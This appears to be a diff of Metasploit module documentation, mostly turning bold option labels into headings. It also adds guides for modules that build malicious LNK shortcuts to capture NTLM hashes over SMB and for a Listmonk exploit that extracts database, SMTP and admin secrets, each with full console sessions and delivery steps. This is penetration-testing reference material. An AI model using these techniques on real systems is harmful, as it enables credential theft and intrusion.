+msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll
+ICON_PATH => %SystemRoot%\\System32\\imageres.dll
+msf auxiliary(fileformat/right_click_lnk_leak) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/right_click_lnk_leak) > run
+
+[*] Creating 'context.lnk' file...
+[+] LNK file created: context.lnk
+[*] Set up a listener (e.g., auxiliary/server/capture/smb) to capture the authentication
+[*] Auxiliary module execution completed
+```
+
+Set up the capture listener on the attacker machine:
+
+```
+msf > use auxiliary/server/capture/smb
+msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(server/capture/smb) > run
+[*] Server started.
+```
+
+Deliver `context.lnk` to the target. When the victim right-clicks it, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:08:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
+
+Use cracking tools to recover credentials from the hash.
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-16.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
+1. Set options like FILENAME, or others as needed.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Place the LNK in a target directory.
+1. Browse the directory in Windows Explorer to trigger the SMB connection.
+1. Check the console for captured NTLM hashes.
+
+## Options
+
+
+### DESCRIPTION
+
+Optional description for the shortcut. If unset, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION System Update
+```
+
+### ICON_PATH
+
+Optional icon path for the LNK. If unset, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+
+## Scenarios
+
+### NTLM Hash Capture via Integrated Server
+
+Target: Windows system with Explorer.
+
+```
+msf > use auxiliary/fileformat/iconenvironmentdatablock_lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set FILENAME leak.lnk
+FILENAME => leak.lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set DESCRIPTION Fake Shortcut
+DESCRIPTION => Fake Shortcut
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
+
+[*] Creating 'leak.lnk' file...
+[+] LNK file created: leak.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver `leak.lnk` to a target folder. Browsing the folder triggers an SMB connection:
+
+```
+[*] SMB Captured - 2025-09-18 21:07:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:victim DOMAIN:VICTIMPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:samplehash
+NT_CLIENT_CHALLENGE:samplechallenge
+```
@@ -20,21 +20,21 @@ without providing any warning to the user. This allows an attacker the opportuni

 ## Options

-**CREATOR**
+### CREATOR

 This option allows you to customise the document author for the new document:
 ```
 set CREATOR New_User
 ```

-**FILENAME**
+### FILENAME

 This option allows you to customise the generated filename:
 ```
 set FILENAME salary.odt
 ```

-**LHOST**
+### LHOST

 This option allows you to set the IP address of the SMB Listener that the .odt document points to:

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
+This can lead to NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+- [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
+
+Disclosure Date: 2025-05-10 (reported to MSRC).
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
+3. Customize options as needed (e.g., set FILENAME or APPNAME).
+4. Execute the module: `run`.
+5. A malicious LNK file will be generated.
+6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
+7. Place the LNK file in a directory on the target system.
+8. Browse to the directory in Windows Explorer to trigger the SMB connection.
+9. Monitor the console for captured NTLM hashes.
+
+## Options
+
+### APPNAME
+
+Sets the display name of the application in the LNK file. If empty, a random name is generated.
+
+Example:
+```
+set APPNAME FakeApp
+```
+
+
+## Scenarios
+
+### Basic NTLM Hash Capture on Windows
+
+Target: A Windows system with Explorer (e.g., Windows 10 or later).
+
+Attacker: Use the module to generate the LNK and capture hashes locally.
+
+```
+msf > use auxiliary/fileformat/specialfolderdatablock_lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set FILENAME malicious.lnk
+FILENAME => malicious.lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set APPNAME FakeApp
+APPNAME => FakeApp
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
+
+[*] Starting SMB server on 192.168.1.25:445
+[*] Generating malicious LNK file
+[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
+When the victim opens the containing folder in Explorer, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:03:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
@@ -28,12 +28,12 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess

 ## Options

-**WEBACCESSUSER**
+### WEBACCESSUSER

 The username to use to log into Advantech WebAccess. By default, there is a built-in account
 ```admin``` that you could use.

-**WEBACCESSPASS**
+### WEBACCESSPASS

 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.
@@ -23,11 +23,11 @@ This will start a webserver running on port 9222 for all network interfaces.

 ## Options

-**FILEPATH**
+### FILEPATH

 The file path on the remote you wish to retrieve.

-**URL**
+### URL

 A URL you wish to fetch the contents of from the remote machine.

@@ -19,15 +19,15 @@ List the steps needed to make sure this thing works

 ## Options

-**RHOSTS**
+### RHOSTS

 Set the target host.

-**RPORT**
+### RPORT

 Set the target port. The default value is `8080` which is the default value used by Tapestry server.

-**TARGETED_CLASS**
+### TARGETED_CLASS

 This is not a required option and by default the value is `AppModule.class` which is also the default java class of by Tapestry server where the hmac key is set. But in case you want to target a different java class, it can be done by setting this option with another class name.

@@ -10,15 +10,15 @@ This module downloads PDF files and extracts the author's name from the document

 ## Options

-**URL**
+### URL

 The URL of a PDF to analyse.

-**URL_LIST**
+### URL_LIST

 File containing a list of PDF URLs to analyze.

-**OUTFILE**
+### OUTFILE

 File to store extracted author names.

@@ -8,23 +8,23 @@ BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11

 ## Options

-**SHOW_MASTHEAD**
+### SHOW_MASTHEAD

 Default: true. Read Organization name from `/masthead/masthead.axfm`

-**SHOW_PACKAGES**
+### SHOW_PACKAGES

 Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`

-**SHOW_SITES**
+### SHOW_SITES

 Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`

-**DOWNLOAD**
+### DOWNLOAD

 Default true. Attempt to download identified packages.

-**ShowURL**
+### ShowURL

 Default false. Show full URL for the packages instead of the filename.

@@ -73,7 +73,7 @@ creds -v
 The `kerberos_enumusers` module only requires the `RHOST`, `DOMAIN` and
 `USER_FILE` options to run.

-**The DOMAIN option**
+### The DOMAIN option

 This option is used to specify the target domain. If the domain name is
 incorrect an error is returned and domain user account enumeration will fail.
@@ -84,7 +84,7 @@ An example of setting DOMAIN:
 set DOMAIN [domain name]
 ```

-**The USER_FILE option**
+### The USER_FILE option

 This option is used to specify the file containing a list of user names
 to query the Domain Controller to identify if they exist in the target domain
@@ -96,7 +96,7 @@ An example of setting USER_FILE:
 set USER_FILE [path to file]
 ```

-**The Timeout option**
+### The Timeout option

 This option is used to specify the TCP timeout i.e. the time to wait
 before a connection to the Domain Controller is established and data read.
@@ -222,25 +222,24 @@ In order to create a template vulnerable to ESC16 scenario 1, follow the first 1
 which is all the steps up to and excluding the `msPKI-Enrollment-Flag", 0x80000` powershell step which is how you set the `CT_FLAG_NO_SECURITY_EXTENSION`.
 Ensure that `StrongCertificateBindingEnforcement` is set to `0` or `1` (not `2`) by running the following command listed in `Configuring Windows to be Vulnerable to ESC9`

-### ESC16 Scenario 2
+#### ESC16 Scenario 2
 When a CA has the OID `1.3.6.1.4.1.311.25.2` added to its `policy\DisableExtensionList` and `StrongCertificateBindingEnforcement` is set to `2`, there is still a way to exploit the template.
 If the policy module's `EditFlags` has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set (which is essentially ESC6), then the template is vulnerable to ESC16 scenario 2.

 Ensure the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set by running following PowerShell command:
 ```powershell
-$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
-$activePolicyName = (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules" -Name "Active").Active
-$editFlagsPath = "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules\$activePolicyName"
-$editFlags = (Get-ItemProperty -Path $editFlagsPath -Name "EditFlags").EditFlags
+certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
+```

-if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {
-    Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag is already enabled."
-} else {
-    # Enable the flag by setting it in the EditFlags value
-    $newEditFlags = $editFlags -bor $EDITF_ATTRIBUTESUBJECTALTNAME2
-    Set-ItemProperty -Path $editFlagsPath -Name "EditFlags" -Value $newEditFlags
-    Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag has been enabled."
-}
+Then restart the Certificate Services service:
+```powershell
+net stop certsvc
+net start certsvc
+```
+
+Then vefify the flag is set by running:
+```powershell
+certutil -getreg policy\EditFlags
 ```

 ## Module usage
@@ -0,0 +1,178 @@
+## Vulnerable Application
+
+This module exploits insecure Sprig template functions in Listmonk versions >= v4.0.0 and < v5.0.2.
+The `env` and `expandenv` functions are enabled by default in campaign templates, allowing
+authenticated users with minimal campaign permissions to extract sensitive environment variables
+through the campaign preview functionality.
+
+Listmonk is a self-hosted newsletter and mailing list manager. Environment variables in
+Listmonk deployments often contain sensitive information such as database credentials,
+SMTP passwords, API keys, and admin credentials.
+
+### Required Privileges
+
+For this exploit to work, the authenticated user must have the following privileges:
+- `campaigns:get` - Permission to get and view campaigns belonging to permitted lists
+- `campaigns:get_all` - Permission to get and view campaigns across all lists
+
+These are minimal privileges that can be assigned to non-admin users in multi-user Listmonk
+installations, making this vulnerability particularly dangerous as it allows privilege escalation
+through environment variable disclosure.
+
+#### Docker Installation (Vulnerable Version)
+
+To install the vulnerable version, run the following command :
+
+```
+curl -LO https://github.com/knadh/listmonk/raw/master/docker-compose.yml
+sed -i 's|image: listmonk/listmonk:latest|image: listmonk/listmonk:v5.0.1|' docker-compose.yml
+docker compose up
+```
+
+#### Vulnerable Versions
+
+- Listmonk >= v4.0.0 and < v5.0.2
+
+#### Patched Versions
+
+- Listmonk >= v5.0.2
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/gather/listmonk_env_disclosure`
+3. Do: `set RHOSTS [target]`
+4. Do: `set USERNAME [username]`
+5. Do: `set PASSWORD [password]`
+6. Optional: `set ENVVAR [comma-separated environment variables]`
+7. Do: `run`
+8. You should see extracted environment variable values
+
+## Options
+
+### USERNAME
+
+The Listmonk username for authentication. This must be a valid user account with
+the required `campaigns:get` and `campaigns:get_all` permissions.
+
+### PASSWORD
+
+The Listmonk password for authentication.
+
+### ENVVAR
+
+A comma-separated list of environment variable names to extract. If not specified,
+the module will automatically attempt to extract a default list of common sensitive
+environment variables.
+
+**Default variables extracted (when ENVVAR is not set):**
+- `LISTMONK_db__host` - Database host
+- `LISTMONK_db__port` - Database port
+- `LISTMONK_db__user` - Database username
+- `LISTMONK_db__password` - Database password
+- `LISTMONK_db__database` - Database name
+- `LISTMONK_app__address` - Application address
+
+**Examples of custom variables to target:**
+- `LISTMONK_app__admin_username`, `LISTMONK_app__admin_password` - Admin credentials
+- `SMTP_HOST`, `SMTP_PORT`, `SMTP_USER`, `SMTP_PASSWORD` - Email server credentials
+- `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` - Cloud provider credentials
+- `DATABASE_URL`, `REDIS_URL` - Connection strings
+- `SECRET_KEY`, `API_KEY` - Application secrets
+- `PATH`, `HOME`, `USER` - System environment variables
+
+### CAMPAIGN_NAME
+
+Optional campaign name to use for the temporary campaign created during extraction.
+If not specified, a random name will be generated to avoid collisions when running
+the module multiple times. The campaign is automatically deleted after extraction.
+
+## Scenarios
+
+### Running Check to Verify Target is Vulnerable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > check
+
+[*] 192.168.1.100:9000 - The target appears to be vulnerable. Listmonk version 5.0.1 is vulnerable
+```
+
+### Extract Default Environment Variables
+
+Running the module without specifying ENVVAR will automatically extract the default
+list of common Listmonk environment variables:
+
+```
+msf6 > use auxiliary/gather/listmonk_env_disclosure
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Using default environment variable list (6 variables)
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__host: localhost
+LISTMONK_db__port: 5432
+LISTMONK_db__user: listmonk_user
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_db__database: listmonk
+LISTMONK_app__address: 0.0.0.0:9000
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Specific Environment Variables
+
+You can target specific environment variables by providing a comma-separated list:
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+ENVVAR => LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: LISTMONK_db__password, LISTMONK_app__admin_password, SMTP_PASSWORD
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_app__admin_password: admin_secret_password
+SMTP_PASSWORD: smtp_pass_2024
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Single Environment Variable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR PATH
+ENVVAR => PATH
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: PATH
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+[*] Auxiliary module execution completed
+```
@@ -33,16 +33,16 @@ resolvable.

 ## Options

-**PROTOCOL**
+### PROTOCOL

 Set this to either TCP or UDP. UDP is the default due to `bootparamd`.

-**CLIENT**
+### CLIENT

 Set this to the address of a client in the target's `bootparams` file.
 Usually this is a host within the same network range as the target.

-**XDRTimeout**
+### XDRTimeout

 Set this to the timeout in seconds for XDR decoding of the response.

@@ -24,21 +24,21 @@ If the link is down, you can find it via the Wayback Machine.

 ## Options

-**PROTOCOL**
+### PROTOCOL

 Set this to either TCP or UDP. TCP is the default due to easy discovery.

-**DOMAIN**
+### DOMAIN

 Set this to your NIS domain.

-**MAP**
+### MAP

 Set this to the NIS map you want to dump. The default is `passwd`. You
 can use the nicknames described in the module info instead of the full
 map names.

-**XDRTimeout**
+### XDRTimeout

 Set this to the timeout in seconds for XDR decoding of the response.

@@ -28,17 +28,39 @@ Office365's implementation of ActiveSync is vulnerable.

 ## Options

-  LOGFILE  =   Output file to use for verbose logging.
-  OUTPUT   =   Output file for results.
-  PASSWORD =   Password to use during enumeration. Note this must exist
-               but does not necessarily need to be valid. If it is
-               found to be valid for an account it will be reported.
-  THREADS  =   Number of concurrent requests to use during enumeration.
-  TIMEOUT  =   HTTP request timeout to use during enumeration.
-  URL      =   URL of Office365 ActiveSync service.
-  USERS    =   Input fie containing candidate usernames, one per line.
-  VERBOSE  =   Enable/Disable DEBUG logging
+### LOGFILE

+Output file to use for verbose logging.
+
+### OUTPUT
+
+Output file for results.
+
+### PASSWORD
+
+Password to use during enumeration. Note this must exist
+but does not necessarily need to be valid. If it is
+found to be valid for an account it will be reported.
+
+### THREADS
+
+Number of concurrent requests to use during enumeration.
+
+### TIMEOUT
+
+HTTP request timeout to use during enumeration.
+
+### URL
+
+URL of Office365 ActiveSync service.
+
+### USERS
+
+Input fie containing candidate usernames, one per line.
+
+### VERBOSE
+
+Enable/Disable DEBUG logging

 ## Scenarios

@@ -39,7 +39,7 @@ wvu@kharak:~$

 ## Options

-  **APIKEY**
+### APIKEY

  Valid API key for accessing Pimcore's REST API in order to perform the injection.

@@ -26,12 +26,12 @@ Manual     Dump an arbitrary file (FILE option)

 ## Options

-**FILE**
+### FILE

 Set this to the file you want to dump. The default is `/etc/passwd`.
 Valid only in manual mode.

-**PRINT**
+### PRINT

 Whether to print file contents to the screen. Valid only in manual mode.

@@ -8,22 +8,22 @@ may need to tweak them for your target.

 ## Options

-**OFFSET_START**
+### OFFSET_START

 You want to set this to a value where you can see a backtrace. Set this
 lower if you're not sure. Default is 2000.

-**OFFSET_END**
+### OFFSET_END

 Set this option to a value where you don't see a backtrace. Set this
 higher if you're not sure. Default is 5000.

-**RETRIES**
+### RETRIES

 Sometimes the attack won't be successful on the first run. This option
 controls how many times to retry the attack. Default is 10.

-**VERBOSE**
+### VERBOSE

 This will tell you how long the binary search took and how many requests
 were sent during exploitation. Default is false.
@@ -18,11 +18,11 @@

 ## Options

-  **ROUTE**
+### ROUTE

  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 

-  **TARGET_FILE**
+### TARGET_FILE

  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).

@@ -16,11 +16,11 @@ In order for this module to function properly, a Shodan API key is needed. You c

 ## Options

-  **TARGET**
+### TARGET

  The remote host to request the API to scan.

-  **SHODAN_APIKEY**
+### SHODAN_APIKEY

  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.

@@ -15,15 +15,15 @@ In order for this module to function properly, a Shodan API key is needed. You c

 ## Options

-  **RHOSTS**
+### RHOSTS

  The target machine(s) whose port information will be obtained from Shodan

-  **SHODAN_APIKEY**
+### SHODAN_APIKEY

  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.

-  **Proxies**
+### Proxies
  A proxy chain of format type:host:port[,type:host:port][...] that will be used to establish the connection to the Shodan servers.


@@ -27,23 +27,23 @@

 ## Options

-**HttpUsername**
+### HttpUsername

 The username for Snare remote access (default: `snare`).

-**HttpPassword**
+### HttpPassword

 The password for Snare remote access (default: blank).

-**REG_DUMP_KEY**
+### REG_DUMP_KEY

 Retrieve the specified registry key and all sub-keys.

-**REG_DUMP_ALL**
+### REG_DUMP_ALL

 Retrieve the entire Windows registry.

-**TIMEOUT**
+### TIMEOUT

 Timeout in seconds for downloading each registry key/hive.

@@ -19,7 +19,7 @@ Microsoft Windows

 ## Options

-**FILENAME**
+### FILENAME
 This option allows you to customise the generated filename and filetpye that is generated.

 To generate desktop.ini configure a filename of desktop.ini
@@ -29,7 +29,7 @@ To generate a lnk file configure a filename of anyname.lnk

 Filetype generation is based on the file extension.

-**LHOST**
+### LHOST
 This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25

@@ -96,4 +96,4 @@ msf auxiliary(multidrop) > exploit
 [] Auxiliary module execution completed
 msf auxiliary(multidrop) > back
 
-  ```
+  ```
@@ -20,11 +20,11 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https

 ## Options

-  **SERVERINFO**
+### SERVERINFO

  If set to `true`, the server info will also enumerated and set in msf's DB.  Defaults to `false`.

-  **CREATEUSER**
+### CREATEUSER

  If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.

@@ -21,27 +21,13 @@ It has been tested with Windows servers 2012, 2016, 2019 and 2022

 ### USER_FILE

-**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+Example: `set USER_FILE /path/to/usernames.txt`

-**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+### RPORT

-**Example:** `set USER_FILE /path/to/usernames.txt`
-
-2- `RHOSTS` (required)
-
-**Description:** The target IP address or range of IP addresses of the Domain Controllers.
-
-**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
-
-**Example:** `set RHOSTS 192.168.1.100`
-
-3- `RPORT` (optional)
-
-**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
-
-**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
-
-**Example:** `set RPORT 49664`
+Optional. The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.

 ## Scenarios

@@ -18,7 +18,7 @@ The following was done on Kali linux:

 ## Options

-**USERS_FILE**
+### USERS_FILE

 The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.

@@ -19,15 +19,15 @@ When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your

 ## Options

-  **FTPUSER**
+### FTPUSER

  Default user for Colorado FTP is `ftpuser`

-  **FTPPASS**
+### FTPPASS

  Default password for Colorado FTP is `ftpuser123`

-  **DEPTH**
+### DEPTH

  Default depth of ../ to do is 2 to get back to the root of Colorado FTP.  This can run anywhere, so you may have to play a bit to find the root.

@@ -14,11 +14,11 @@ http://www.efssoft.com/efsfs.exe

 Since the FTP server allows anonymous access, by default, you only need to configure:

-**RHOSTS**
+### RHOSTS

 The FTP server IP address.

-**PATH**
+### PATH

 The file you wish to download. Assume this path starts from C:\

@@ -101,7 +101,7 @@ The following table contains the file types associated with the characters:

 ## Options

-  **PATH**
+### PATH

  It is possible to view content within a directory of the gophermap.  If the initial run shows directory `Directory: foobar`,
  setting **path** to `/foobar` will enumerate the contents of that folder.  Default: [empty string].
@@ -6,7 +6,7 @@ Open-source GGSN implementations can be used as a target for this module as well

 ## Options

-   **The RPORT option**
+### The RPORT option

   This option can be changed to target GTP-U (2152) or GTP-C (2123), which both use the same packet type for echo probing.

@@ -73,20 +73,20 @@ To setup an Environment that the scanner can be run against, follow the below st

 ## Options

-**CMD**
+### CMD

 This is the command that will be run by the scanner. The default setting is `/usr/bin/id`.

-**CVE**
+### CVE

 This is the CVE that will be used to exploit the vulnerability.
 The default setting is `CVE-2014-6271` but valid options are `CVE-2014-6271` or `CVE-2014-6278`.

-**HEADER**
+### HEADER

 This is the user agent string that is sent when the module is run. The default setting is `User-Agent`.

-**METHOD**
+### METHOD

 This is HTTP method used by the module.  The default setting is `GET`.

@@ -70,19 +70,19 @@ docker start CVE-2021-42013

 ## Options

-**CVE**
+### CVE

 The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013). Default: CVE-2021-42013

-**DEPTH**
+### DEPTH

 Depth for path traversal. Default: 5

-**FILEPATH**
+### FILEPATH

 The file you want to read. Default: `/etc/passwd`

-**TARGETURI**
+### TARGETURI

 Base path. Default: `/cgi-bin`

@@ -23,6 +23,6 @@ http://goo.gl/pHAqS1

 ## Options

-  **TRYDEFAULT**
+### TRYDEFAULT

  The ```TRYDEFAULT``` options adds the default credential admin:123456 to the credential list.
@@ -52,7 +52,7 @@ ctx.qry.path can come from querystring_cb(), which takes unescaped data from the

 ## Options

-**REPO**
+### REPO

 Git repository on the remote server. Default is empty, `''`.

@@ -16,11 +16,11 @@

 ## Options

-  **HttpUsername**
+### HttpUsername

  Username to use for basic authentication.  Default value is `cisco`

-  **HttpPassword**
+### HttpPassword

  Password to use for basic authentication.  Default value is `cisco`

@@ -10,19 +10,19 @@ You can use any web application to test the crawler.

 ## Options

-  **URI**
+### URI

  Default path is `/`

-  **DirBust**
+### DirBust

  Bruteforce common url path, default is `true` but may generate noise in reports.

-  **HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
+### HttpPassword, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**

  You can add some login information

-  **UserAgent**
+### UserAgent

  Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`

@@ -4,7 +4,7 @@ This module scans for Docker servers listening on a TCP port (default 2375).

 ## Options

-**VERBOSE**
+### VERBOSE

 Enable this to dump all info to the screen.

--- a/Show More
+++ b/Show More